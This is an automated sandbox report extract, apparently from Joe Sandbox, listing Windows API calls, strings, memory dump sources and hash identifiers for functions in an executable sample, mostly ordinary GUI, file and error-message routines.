                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0093AF51
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0093AF6E
                                                                                                                • _wcscmp.LIBCMT ref: 0093AF8C
                                                                                                                • _wcsstr.LIBCMT ref: 0093AF9D
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0093AFD5
                                                                                                                • _wcscmp.LIBCMT ref: 0093AFE5
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0093B00C
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0093B055
                                                                                                                • _wcscmp.LIBCMT ref: 0093B065
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0093B08D
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 0093B0F6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: 3b1a64daab446bb79e42891c15719ba32d2d30f7ba77c5854240cc5de7491dad
                                                                                                                • Instruction ID: 5ea45b30e5d197faf3d02d0386898d0cc8f1011e413c911c5eee0dca4e728e41
                                                                                                                • Opcode Fuzzy Hash: 3b1a64daab446bb79e42891c15719ba32d2d30f7ba77c5854240cc5de7491dad
                                                                                                                • Instruction Fuzzy Hash: AD818F711082099FDB05DF54C895BAA7BECFF84318F04856AFE858A0A6DB34DD45CFA2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: c841bf54d7d16e6d5dc5da88926650105ffc7ae1e375c6684f98811135ae6922
                                                                                                                • Instruction ID: 4e9d1fc20583d4d312682e8da35970698ae62f9589c840ec734872168d04d05f
                                                                                                                • Opcode Fuzzy Hash: c841bf54d7d16e6d5dc5da88926650105ffc7ae1e375c6684f98811135ae6922
                                                                                                                • Instruction Fuzzy Hash: 1A318531948205ABDE14FBA9DD03EEEB768AF61715F600419F492B10E1EF516F04CA57
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00955013
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0095501E
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00955029
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00955034
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 0095503F
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 0095504A
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00955055
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00955060
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 0095506B
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00955076
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00955081
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0095508C
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00955097
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 009550A2
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 009550AD
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 009550B8
                                                                                                                • GetCursorInfo.USER32(?), ref: 009550C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 5191808d5928a03886b3ee09b53f90331e3099c27e7a83a7e42139304646ee48
                                                                                                                • Instruction ID: 5835637c9fdf5b743482149cdde89a40220deb5eea7429c2167c18e48c4dd3aa
                                                                                                                • Opcode Fuzzy Hash: 5191808d5928a03886b3ee09b53f90331e3099c27e7a83a7e42139304646ee48
                                                                                                                • Instruction Fuzzy Hash: ED3112B1D083196ADF109FB68C8996EBFE8FF04750F50453AE50CE7281DA78A5048F91
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0096A259
                                                                                                                • DestroyWindow.USER32(?,?), ref: 0096A2D3
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0096A34D
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0096A36F
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096A382
                                                                                                                • DestroyWindow.USER32(00000000), ref: 0096A3A4
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008E0000,00000000), ref: 0096A3DB
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0096A3F4
                                                                                                                • GetDesktopWindow.USER32 ref: 0096A40D
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0096A414
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0096A42C
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0096A444
                                                                                                                  • Part of subcall function 008E25DB: GetWindowLongW.USER32(?,000000EB), ref: 008E25EC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 1297703922-3619404913
                                                                                                                • Opcode ID: e877c7b07d7c8a4cd6fef72bd89ad01647c4709e531d55d42f805fb672be9f42
                                                                                                                • Instruction ID: 344740433c706d31982579d94123538652f8ebc37747bc7e518077c91eeb310a
                                                                                                                • Opcode Fuzzy Hash: e877c7b07d7c8a4cd6fef72bd89ad01647c4709e531d55d42f805fb672be9f42
                                                                                                                • Instruction Fuzzy Hash: A3718970254205AFD721CF28CC49F6A7BE9FB89704F04492CF985972B1DBB5A902DF52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E2612: GetWindowLongW.USER32(?,000000EB), ref: 008E2623
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 0096C627
                                                                                                                  • Part of subcall function 0096AB37: ClientToScreen.USER32(?,?), ref: 0096AB60
                                                                                                                  • Part of subcall function 0096AB37: GetWindowRect.USER32(?,?), ref: 0096ABD6
                                                                                                                  • Part of subcall function 0096AB37: PtInRect.USER32(?,?,0096C014), ref: 0096ABE6
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0096C690
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0096C69B
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0096C6BE
                                                                                                                • _wcscat.LIBCMT ref: 0096C6EE
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0096C705
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0096C71E
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0096C735
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0096C757
                                                                                                                • DragFinish.SHELL32(?), ref: 0096C75E
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0096C851
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 169749273-3440237614
                                                                                                                • Opcode ID: 38dfd869a5ae847933b62b46a3975c9b12effb42ccdd1495ed92983f27c71857
                                                                                                                • Instruction ID: 116845a8c88d62e76139e74272672e8a437c925b9402705f8472d06c4d2973d7
                                                                                                                • Opcode Fuzzy Hash: 38dfd869a5ae847933b62b46a3975c9b12effb42ccdd1495ed92983f27c71857
                                                                                                                • Instruction Fuzzy Hash: D3614771508341AFC701EF69DC85DABBBE8FF8A754F00092EF5A5921B1DB709A09CB52
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00964424
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0096446F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 3974292440-4258414348
                                                                                                                • Opcode ID: de160b1a3f98eb37cb7f1c98d69f08f62ea62936a76612e08810138087ca5fa8
                                                                                                                • Instruction ID: 53a1b81f1e227913e8bd4502efed9a98e4f6a80e948f4cd5cc97c9289fb928dc
                                                                                                                • Opcode Fuzzy Hash: de160b1a3f98eb37cb7f1c98d69f08f62ea62936a76612e08810138087ca5fa8
                                                                                                                • Instruction Fuzzy Hash: 169158702043519FCB14EF68C451B6EB7E5AF96354F04886CF8969B3A2CB75ED09CB82
                                                                                                                APIs
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0096B8B4
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009691C2), ref: 0096B910
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096B949
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0096B98C
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0096B9C3
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0096B9CF
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0096B9DF
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,009691C2), ref: 0096B9EE
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0096BA0B
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0096BA17
                                                                                                                  • Part of subcall function 00902EFD: __wcsicmp_l.LIBCMT ref: 00902F86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 1212759294-1154884017
                                                                                                                • Opcode ID: b95d9e748eaa9424c411a72ab21e18d74628111217104ee148f325ae14de747b
                                                                                                                • Instruction ID: 0156c1c732e0d8518bfa2b173f58650bde19b8a5ffc64969f34e2a326c341000
                                                                                                                • Opcode Fuzzy Hash: b95d9e748eaa9424c411a72ab21e18d74628111217104ee148f325ae14de747b
                                                                                                                • Instruction Fuzzy Hash: 3261CD71940219BAEB14DF68DC45FBE7BACFB08714F10451AFA15D61D0EBB49980DBA0
                                                                                                                APIs
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 0094DCDC
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0094DCEC
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0094DCF8
                                                                                                                • __wsplitpath.LIBCMT ref: 0094DD56
                                                                                                                • _wcscat.LIBCMT ref: 0094DD6E
                                                                                                                • _wcscat.LIBCMT ref: 0094DD80
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0094DD95
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDA9
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDDB
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0094DDFC
                                                                                                                • _wcscpy.LIBCMT ref: 0094DE08
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0094DE47
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 3566783562-438819550
                                                                                                                • Opcode ID: f938b5e24f69c23c1d535cbef06083fe335c78174764a9ce19776ce6143c7996
                                                                                                                • Instruction ID: f042f98d6283dda5e0c8e8028751efd12a5cf0428db0a8b6e76a43faf8a1fbf9
                                                                                                                • Opcode Fuzzy Hash: f938b5e24f69c23c1d535cbef06083fe335c78174764a9ce19776ce6143c7996
                                                                                                                • Instruction Fuzzy Hash: 88618B765042459FCB10EF24C884EAEB3E8FF89314F04492EF989C7251EB71E945CB92
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00949C7F
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00949CA0
                                                                                                                • __swprintf.LIBCMT ref: 00949CF9
                                                                                                                • __swprintf.LIBCMT ref: 00949D12
                                                                                                                • _wprintf.LIBCMT ref: 00949DB9
                                                                                                                • _wprintf.LIBCMT ref: 00949DD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                • API String ID: 311963372-3080491070
                                                                                                                • Opcode ID: 33a5f51002940727207508d30b05c284cd2eaef17e4d052a7f86d228fe5d5ecb
                                                                                                                • Instruction ID: 2400ba605cea6bfc9b880c7a783cb2742d4454b4ce84727f44b75d2141ca3fec
                                                                                                                • Opcode Fuzzy Hash: 33a5f51002940727207508d30b05c284cd2eaef17e4d052a7f86d228fe5d5ecb
                                                                                                                • Instruction Fuzzy Hash: F4518E31D04549AACF14EBE9DD46EEEB778FF16304F600065F519B20A2EB312E58DB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E9837: __itow.LIBCMT ref: 008E9862
                                                                                                                  • Part of subcall function 008E9837: __swprintf.LIBCMT ref: 008E98AC
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 0094A3CB
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0094A418
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A460
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A497
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094A4C5
                                                                                                                  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                • Opcode ID: b10750d798dc233b96adb3145f070c6cc58282cb3532fcfe9a273a9ecbe8df8c
                                                                                                                • Instruction ID: 4ffb965456b6a301baedc2b3a60092fb5330783701bac98228fccce1f55c556b
                                                                                                                • Opcode Fuzzy Hash: b10750d798dc233b96adb3145f070c6cc58282cb3532fcfe9a273a9ecbe8df8c
                                                                                                                • Instruction Fuzzy Hash: E0513B711083459FC700EF19C89196BB7E8FF96718F10486DF89A97261DB71AD09CB52
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0091E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0093F8DF
                                                                                                                • LoadStringW.USER32(00000000,?,0091E029,00000001), ref: 0093F8E8
                                                                                                                  • Part of subcall function 008E7DE1: _memmove.LIBCMT ref: 008E7E22
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,009A5310,?,00000FFF,?,?,0091E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0093F90A
                                                                                                                • LoadStringW.USER32(00000000,?,0091E029,00000001), ref: 0093F90D
                                                                                                                • __swprintf.LIBCMT ref: 0093F95D
                                                                                                                • __swprintf.LIBCMT ref: 0093F96E
                                                                                                                • _wprintf.LIBCMT ref: 0093FA17
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0093FA2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                • Opcode ID: 113814798b315813de85cf5a88159ec4b8dd30234111539aed85b008bf87b992
                                                                                                                • Instruction ID: 04c8e45b61c3252e0a90c05fabd4d5efc4b71da0df5bafbb961b767929a2cd72
                                                                                                                • Opcode Fuzzy Hash: 113814798b315813de85cf5a88159ec4b8dd30234111539aed85b008bf87b992
                                                                                                                • Instruction Fuzzy Hash: 56413A72904149AACF04FBE9DD96EEE777CEF56350F100065F506E60A2EA316F09CB62
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00969207,?,?), ref: 0096BA56
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA6D
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA78
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA85
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0096BA8E
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BA9D
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0096BAA6
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BAAD
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00969207,?,?,00000000,?), ref: 0096BABE
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00972CAC,?), ref: 0096BAD7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0096BAE7
                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0096BB0B
                                                                                                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0096BB36
                                                                                                                • DeleteObject.GDI32(00000000), ref: 0096BB5E
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0096BB74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
